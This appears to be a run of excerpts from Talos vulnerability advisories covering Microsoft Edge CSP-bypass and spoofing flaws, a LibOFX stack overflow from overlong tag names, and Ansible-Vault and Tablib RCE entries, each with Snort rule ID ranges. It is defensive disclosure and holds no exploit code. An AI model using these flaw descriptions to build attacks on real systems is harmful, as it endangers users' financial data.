A vulnerability in Microsoft Edge has been identified that could allow an attacker to bypass the Content Security Policy (CSP) feature. This vulnerability manifests due to improperly validating certain specially crafted documents. Successful exploitation could allow an attacker to redirect users to a malicious web page. Users who visit a specially crafted web page under the control of the attacker could be exploited. Alternatively, users who visit a compromised web page or who get served a malicious advertisement an attacker has injected into an advertising network could be exploited.

CVE-2017-8735 - Microsoft Edge Spoofing Vulnerability

A vulnerability in Edge has been identified that could allow an attacker to spoof content on a targeted host. This vulnerability manifests due to improper parsing of HTTP content. Successful exploitation of this vulnerability would result in the user being redirected to a web site of the attacker's choosing. This web site could then spoof content or serve as part of an exploit chain whereby the user could be exploited via another vulnerability. Scenarios where a user could be attacked include email or instant message vectors where the user clicks on a malicious link, or if the user navigates to a specially crafted web page under the control of the attacker.

Coverage

In response to these vulnerability disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules:

• 42285-42286
• 42311-42312
• 42749-42750
• 44331-44336
• 44338-44343
• 44349-44350
• 44353-44357

This vulnerability was discovered by Cory Duplantis of Talos

Overview

LibOFX is an open source implementation of OFX (Open Financial Exchange) an open format used by financial institutions to share financial data with clients. As an implementation of a complex standard, this library is used by financial software such as GnuCash. Talos has discovered an exploitable buffer overflow in the implementation: a specially crafted OFX file can cause a write out of bounds resulting in code execution. This vulnerability is not currently patched and Talos has not received a response from the developers within the period specified by the Vendor Vulnerability Reporting and Disclosure Policy.

TALOS-2017-0317 (CVE-2017-2816) - LibOFX Tag Parsing Code Execution Vulnerability

Ironically, the vulnerability is located in the way that tags are parsed by the sanitize function. In the function, the tag's names are stored locally on the stack, a too long tag name results in a stack overflow.

More details can be found in the vulnerability reports:TALOS-2017-0317

Tested Version: LibOFX 0.9.11

Discussion

As an open source library, LibOFX may be used in various financial applications. This vulnerability presents many attractive features for attackers. User interaction is not necessarily required to trigger the vulnerability, and any systems presenting with this vulnerability are likely to contain valuable financial information which can be stolen to conduct identity theft, fraud, or easily sold on to other criminals.

Organisations may not be aware of the presence of this library being used to parse OFX files in third party software, or in software that has been developed as part of an in-house system. Keeping track of open source libraries used within in-house projects, and quickly applying patches supplied by third party vendors is vital to ensure that vulnerabilities such as these, which are particularly enticing to attackers, are properly managed.

Coverage

The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules: 42277-4227

Overview

TALOS-2017-0305 Remote Code Execution Vulnerability in Ansible-Vault Library. (CVE-2017-2809)

TALOS-2017-0307 Remote Code Execution Vulnerability in Tablib. (CVE-2017-2810)

Coverage